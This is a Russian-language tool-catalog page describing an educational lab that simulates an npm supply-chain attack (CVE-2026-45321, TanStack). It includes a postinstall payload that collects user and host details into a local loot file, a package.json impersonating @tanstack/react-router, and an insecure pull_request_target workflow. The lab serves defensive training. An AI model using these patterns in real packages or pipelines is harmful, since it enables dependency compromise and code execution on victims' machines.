Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-45321-Tanstack — Учебная лаборатория, симулирующая атаки на цепочку поставок npm, злоупотребление CI/CD и выполнение кода во время установки через CVE-2026-45321. Практическое обучение защитной безопасности с локальным развертыванием вредоносных пакетов. | Kitploit
Инструменты/GitHubGitHub/7whyex/cve-2026-45321-tanstack
Анализ уязвимостейАнализ вредоносных программБезопасность Цепочки ПоставокОбучение и ОбразованиеЛаборатории и Практика
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Учебная лаборатория, симулирующая атаки на цепочку поставок npm, злоупотребление CI/CD и выполнение кода во время установки через CVE-2026-45321. Практическое обучение защитной безопасности с локальным развертыванием вредоносных пакетов.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 месяц назадЕщё не проверено

Симуляция атаки на цепочку поставок — CVE-2026-45321 (TanStack)

Образовательная лаборатория для понимания атак на цепочку поставок npm, злоупотребления CI/CD и выполнения кода во время установки

Отказ от ответственности

Этот проект создан исключительно для:

  • обучения кибербезопасности,
  • исследований в области защитной безопасности,
  • симуляции локальной лаборатории,
  • понимания концепции атаки на цепочку поставок.

Не используйте этот проект для:

  • атак на реальные системы,
  • кражи учётных данных,
  • развёртывания вредоносного ПО,
  • несанкционированного доступа,
  • или любых других незаконных действий.

Описание

Лаборатория симулирует основные концепции инцидента:

  • CVE-2026-45321
  • Компрометация цепочки поставок npm TanStack
  • Злоупотребление GitHub Actions CI/CD
  • Выполнение скриптов жизненного цикла npm

Симуляция выполняется локально и безопасно, без:

  • реальной кражи учётных данных,
  • эксфильтрации токенов,
  • или компрометации сторонних сервисов.

Структура лаборатории

root@kitploit:~
lab/
├── fake-repo/          # Симуляция репозитория цели
├── attacker-package/   # Симуляция вредоносного пакета
└── victim-project/     # Симуляция жертвы

Принцип работы симуляции

root@kitploit:~
Пакет злоумышленника
        ↓
npm install
        ↓
Выполняется скрипт postinstall
        ↓
payload.js выполняется автоматически
        ↓
Жертва подвергается выполнению кода во время установки

Изучаемые концепции

  • хуки жизненного цикла npm
  • произвольное выполнение кода во время установки
  • атака на цепочку поставок
  • граница доверия CI/CD
  • вредоносный пакет npm
  • злоупотребление postinstall
  • компрометация зависимостей

Установка

1. Клонирование репозитория

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Настройка пакета злоумышленника

2. Переход в папку пакета злоумышленника

root@kitploit:~
cd attacker-package

3. Установка зависимостей

root@kitploit:~
npm install

4. Сборка tarball-пакета

root@kitploit:~
npm pack

Результат:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Симуляция жертвы

5. Переход в проект жертвы

root@kitploit:~
cd ../victim-project

6. Установка вредоносного пакета

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Вывод

В случае успеха появится:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

и файл:

root@kitploit:~
loot.txt

будет создан автоматически.


Пример payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Пример package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

Симуляция CI/CD

Этот проект также можно использовать для понимания:

  • GitHub Actions
  • pull_request_target
  • границ привилегий CI/CD
  • выполнения зависимостей

Пример workflow:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Связь с CVE-2026-45321

Симуляция в лабораторииРеальный мир
attacker-packageскомпрометированный пакет TanStack
payload.jsвредоносный установщик

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Только в образовательных целях

Эта лаборатория создана для повышения осведомлённости о:

  • безопасности цепочки поставок,
  • безопасности зависимостей,
  • безопасности CI/CD,
  • и исследованиях в области защитной безопасности.
Скачать инструмент
postinstallзлоупотребление хуком жизненного цикла
victim-projectразработчик/жертва CI
fake-repoконвейер GitHub Actions